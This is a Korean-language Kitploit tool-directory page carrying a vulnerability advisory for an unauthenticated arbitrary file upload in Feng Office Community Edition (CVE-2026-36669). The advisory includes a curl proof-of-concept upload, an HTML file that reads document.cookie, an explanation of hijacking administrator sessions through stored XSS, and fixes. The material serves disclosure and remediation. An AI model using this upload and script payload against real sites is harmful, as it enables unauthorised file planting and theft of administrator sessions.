Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/firstlax6t/cve-2026-36669-fengoffice
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubfirstlax6t/cve-2026-36669-fengoffice

CVE-2026-36669-FengOffice

CVE-2026-36669에 대한 상세 보안 권고: Feng Office에서 인증되지 않은 임의 파일 업로드로, 저장형 XSS 및 세션 하이재킹 가능. 기술 분석, PoC 및 수정 단계 포함.

저장소 보기
361개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

보안 권고: CVE-2026-36669

Feng Office Community Edition에서의 인증되지 않은 임의 파일 업로드

ck_upload_handler.php에 **Feng Office Community Edition (버전 3.11.13.11)**의 인증되지 않은 임의 파일 업로드 취약점이 존재합니다. 이 결함으로 인해 원격의 인증되지 않은 공격자가 웹 접근 가능 디렉터리에 임의의 파일(악성 .html 또는 .php 스크립트 포함)을 업로드할 수 있습니다. 관리자 쿠키 보호(HttpOnly) 부재와 결합하면, 이 취약점은 저장형 사이트 간 스크립팅(Stored XSS) 및 관리자 세션 탈취로 이어질 수 있습니다.


취약점 개요

항목세부 정보
CVE 식별자CVE-2026-36669
취약점 유형위험한 유형의 파일 무제한 업로드 (CWE-434)
관련 약점중요 기능에 대한 인증 누락 (CWE-306)
영향받는 제품Feng Office Community Edition
영향받는 버전버전 3.11.13.11 (및 잠재적으로 이전 버전)
악용 상태개념 증명(PoC) 확인됨
수정 상태패치되지 않음 (공급업체에 통보했으나, 표준 공개 기간 내에 패치가 제공되지 않음)

기술적 분석

1. 인증 경계 누락 (CWE-306)

ck_upload_handler.php 엔드포인트는 독립 스크립트로 작동합니다. 메인 애플리케이션의 인증 미들웨어나 접근 제어 목록(ACL)을 로드하거나 상속하지 않습니다. 결과적으로 이 스크립트로 직접 전송된 모든 외부 요청은 인증된 것으로 처리됩니다.

2. 확장자 검증 비활성화 (CWE-434)

ck_upload_handler.php의 소스 코드에서 특정 이미지 형식(.jpg, .png, .gif)으로 업로드를 제한하도록 설계된 서버 측 파일 검증 로직(21-25행)이 명시적으로 주석 처리되어 있습니다:

root@kitploit:~
// $pattern = "/\.(jpg|png|gif)$/i";
// if (!preg_match($pattern,$_FILES['upload']['name'])) {
//     ...
// }

이 정규식 제약 조건이 비활성화되었기 때문에 파일 업로드 메커니즘은 사용자가 제공한 모든 확장자를 허용합니다.

3. 예측 가능한 경로 및 직접 실행

이 스크립트는 PHP copy() 함수를 사용하여 업로드된 파일을 웹 접근 가능하도록 구성된 /tmp/ 디렉터리에 직접 씁니다.

4. 하위 영향: 저장형 XSS를 통한 세션 탈취

전역 설정 파일 application/config/config.php는 세션 쿠키에 HttpOnly 플래그를 적용하지 않습니다. 공격자가 클라이언트 측 스크립트 블록이 포함된 .html 파일을 업로드하면, 해당 파일을 보는 모든 관리자는 활성 세션의 컨텍스트 내에서 스크립트를 실행하게 됩니다. 이를 통해 공격자는 활성 관리자 세션 토큰을 조용히 추출할 수 있습니다.


개념 증명 (PoC)

참고: 이 개념 증명은 교육 및 방어 감사 목적으로만 제공됩니다.

취약점을 확인하려면, 필수 CKEditorFuncNum 매개변수를 추가하여 무해한 확인 파일(예: test.html)이 포함된 multipart POST 요청을 엔드포인트로 보내십시오:

요청

root@kitploit:~
curl -i -X POST \
  -F "[email protected]" \
  "http://<대상-도메인>/ck_upload_handler.php?CKEditorFuncNum=1"

여기서 test.html은 기본 개념 증명 HTML 마크업을 포함합니다:

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
    <script>
        alert("취약점 확인됨: " + document.cookie);
    </script>
</body>
</html>

예상 응답

취약한 경우, 서버는 200 OK 상태로 응답하고 업로드 경로를 나타내는 JavaScript 블록을 출력합니다:

root@kitploit:~
<script type="text/javascript">
    window.parent.CKEDITOR.tools.callFunction("1", "/tmp/test.html", "");
</script>

권장 수정 사항

영향받는 버전의 Feng Office를 사용하는 경우, 파일 업로드 엔드포인트를 보호하기 위해 다음과 같은 수동 핫픽스를 적용하십시오:

1. 인증 적용 구현

ck_upload_handler.php가 파일 업로드 로직을 처리하기 전에 활성 관리자 세션을 확인하도록 하십시오.

2. 서버 측 파일 검증 재활성화

확장자 검사를 주석 해제하고 엄격하게 적용하십시오. 예상되는 비실행 이미지 MIME 유형과 명시적으로 일치하지 않는 업로드는 거부하십시오:

root@kitploit:~
$pattern = "/\.(jpg|jpeg|png|gif)$/i";
if (!preg_match($pattern, $_FILES['upload']['name'])) {
    header("HTTP/1.1 403 Forbidden");
    exit("Invalid file type.");
}

3. HttpOnly 쿠키 적용

PHP 설정 또는 애플리케이션 부트스트랩 구성을 수정하여 세션 쿠키가 클라이언트 측 스크립팅 API를 통해 접근할 수 없도록 하십시오:

root@kitploit:~
session.cookie_httponly = On

공개 타임라인

  • 2026년 2월 20일: 최초 취약점 발견 및 Feng Office 지원 팀에 초기 통지 전송.
  • 2026년 3월 12일: MITRE에 CVE 식별자 요청.
  • 2026년 3월 15일: 공급업체가 보고서 수신을 확인하고, 검토를 위해 일시 중지를 요청.
  • 2026년 3월 29일: MITRE가 공식적으로 CVE-2026-36669를 할당. 공급업체에 공식 할당 추적 ID를 통보했으나 추가 업데이트 없음.
  • 2026년 6월 29일: 14일 표준 공개 일정을 명시한 최종 통지를 공급업체에 전송.
  • 2026년 7월 13일: 협력 대응/패치 기한 만료. 응답 없음.
  • 2026년 7월 15일: 권고 공개.

발견자

Soufiane LAGZIRI

도구 다운로드